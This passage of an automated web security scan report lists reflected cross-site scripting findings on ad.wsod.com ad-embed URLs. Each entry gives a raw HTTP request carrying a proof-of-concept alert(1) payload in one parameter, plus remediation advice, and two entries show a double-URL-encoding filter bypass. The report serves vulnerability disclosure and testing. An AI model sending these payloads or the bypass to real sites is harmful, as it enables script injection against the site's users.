GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488fa01b"-alert(1)-"1b5b12782c4&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:40:35 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8921f"-alert(1)-"0ff0bbaf9e4 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G8921f"-alert(1)-"0ff0bbaf9e4&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:40:22 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcba9"-alert(1)-"1c04fc64770 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!dcba9"-alert(1)-"1c04fc64770&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:40:00 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
5.134. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bede"-alert(1)-"9ed5f8f0fb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8&6bede"-alert(1)-"9ed5f8f0fb1=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:42:33 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1684
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9a1e"-alert(1)-"0aefbd57b48 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639b9a1e"-alert(1)-"0aefbd57b48&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:49:18 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 685ba"-alert(1)-"3346fc71ccf was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894685ba"-alert(1)-"3346fc71ccf&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:50:14 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c84f4"-alert(1)-"735b0bb387b was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9c84f4"-alert(1)-"735b0bb387b HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:50:32 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa884"-alert(1)-"d97069342a2 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQaa884"-alert(1)-"d97069342a2&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:50:23 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d21a1%2522%253balert%25281%2529%252f%252ff11855debe8 was submitted in the REST URL parameter 2. This input was echoed as d21a1";alert(1)//f11855debe8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357d21a1%2522%253balert%25281%2529%252f%252ff11855debe8/353.0.js.120x30/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:51:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ebba%2522%253balert%25281%2529%252f%252fc747ad1690c was submitted in the REST URL parameter 3. This input was echoed as 4ebba";alert(1)//c747ad1690c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x304ebba%2522%253balert%25281%2529%252f%252fc747ad1690c/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:51:25 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa04f"-alert(1)-"69f6ed3ba42 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488aa04f"-alert(1)-"69f6ed3ba42&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:50:00 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19848"-alert(1)-"51dae16ac72 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G19848"-alert(1)-"51dae16ac72&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:49:41 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dcce"-alert(1)-"9ebcb941c85 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!5dcce"-alert(1)-"9ebcb941c85&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:49:02 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
5.144. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad392"-alert(1)-"602f61bfc3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9&ad392"-alert(1)-"602f61bfc3a=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:51:03 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1683
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48c66"-alert(1)-"510a8f1797d was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=801063948c66"-alert(1)-"510a8f1797d&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:40:09 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2c3a"-alert(1)-"4061da44426 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147b2c3a"-alert(1)-"4061da44426&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:40:49 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40464"-alert(1)-"1a138402111 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
